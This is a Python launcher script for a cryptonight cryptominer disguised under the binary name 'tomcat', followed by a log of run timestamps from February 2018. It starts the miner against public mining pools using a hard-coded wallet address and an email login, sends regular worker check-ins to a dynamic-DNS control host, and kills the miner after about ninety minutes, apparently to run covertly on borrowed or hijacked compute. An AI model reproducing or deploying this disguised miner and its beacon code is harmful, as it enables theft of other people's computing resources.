import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:09:05.959798
#2018-02-17 15:56:07.566537
#2018-02-17 17:44:04.412746
#2018-02-17 19:32:03.724815
#2018-02-17 21:21:04.964893
#2018-02-17 23:05:07.823814
#2018-02-18 00:52:04.133410
#2018-02-18 02:39:04.147043
#2018-02-18 04:27:01.378913
#2018-02-18 06:18:05.010337
#2018-02-18 08:08:01.440391
#2018-02-18 09:54:06.531420
#2018-02-18 11:41:05.888896
#2018-02-18 13:26:06.117956
#2018-02-18 15:16:04.921155
#2018-02-18 17:05:04.033156
#2018-02-18 18:52:05.457175
#2018-02-18 20:39:07.067922
#2018-02-18 22:25:03.075919
#2018-02-19 00:14:07.096642
#2018-02-19 02:00:03.942213
#2018-02-19 03:46:08.250153
#2018-02-19 05:31:01.338629
#2018-02-19 07:18:02.143873
#2018-02-19 09:07:07.311747
#2018-02-19 10:57:07.484599
#2018-02-19 12:45:01.430439
#2018-02-19 14:34:05.513876
#2018-02-19 16:22:08.963423
#2018-02-19 18:09:02.220160
#2018-02-19 19:55:05.846485
#2018-02-19 21:44:08.070291
#2018-02-19 23:31:01.464184
#2018-02-20 01:17:01.620982
#2018-02-20 03:06:06.616207
#2018-02-20 04:53:04.972959
#2018-02-20 06:36:04.231360
#2018-02-20 08:21:05.074941
#2018-02-20 10:06:02.006608
#2018-02-20 11:50:08.413367
#2018-02-20 13:37:09.226925
#2018-02-20 15:20:09.114683
#2018-02-20 17:07:02.201680
#2018-02-20 18:56:09.175195
#2018-02-20 20:46:01.943794
#2018-02-20 22:32:04.237241
#2018-02-21 00:14:04.521198
#2018-02-21 01:59:06.156583
#2018-02-21 03:47:06.183554
#2018-02-21 05:37:05.506892
#2018-02-21 07:26:03.519038
#2018-02-21 09:10:09.583052
#2018-02-21 10:59:10.379863
#2018-02-21 12:45:09.296622
#2018-02-21 14:32:01.412788
#2018-02-21 16:19:06.098571
#2018-02-21 18:11:07.935139
#2018-02-21 19:57:07.271694
#2018-02-21 21:45:10.010862
#2018-02-21 23:32:05.240248
#2018-02-22 01:22:06.291638
#2018-02-22 03:12:08.062032
#2018-02-22 04:58:03.441749
#2018-02-22 06:42:07.441209
#2018-02-22 08:31:06.804162
#2018-02-22 10:18:04.630387
#2018-02-22 12:03:01.535205
#2018-02-22 13:48:01.466218
#2018-02-22 15:36:09.683306
#2018-02-22 17:23:06.401661
#2018-02-22 19:11:05.966745
#2018-02-22 21:03:01.552448
#2018-02-22 22:47:04.324817
#2018-02-23 00:35:06.305049
#2018-02-23 02:23:04.286550
#2018-02-23 04:11:05.807242
#2018-02-23 05:57:01.714822
#2018-02-23 07:46:08.128754
#2018-02-23 09:50:03.056922
#2018-02-23 11:55:10.751625
#2018-02-23 13:43:05.101063
#2018-02-23 15:32:09.184838
#2018-02-23 17:22:01.457638
#2018-02-23 19:07:02.144282
#2018-02-23 20:52:01.244018
#2018-02-23 22:38:07.094999
#2018-02-24 00:24:07.764057
#2018-02-24 02:15:08.993794
#2018-02-24 04:05:08.016881
#2018-02-24 05:50:05.436451
#2018-02-24 07:40:08.038176
#2018-02-24 09:25:07.094767
#2018-02-24 11:18:06.980427
#2018-02-24 13:07:01.996395
#2018-02-24 14:56:04.498252
#2018-02-24 16:46:07.061375
#2018-02-24 18:34:07.484030
#2018-02-24 20:21:01.366587
#2018-02-24 22:16:05.331965
#2018-02-25 01:25:05.280944
#2018-02-25 05:30:06.346890
#2018-02-25 11:35:06.077637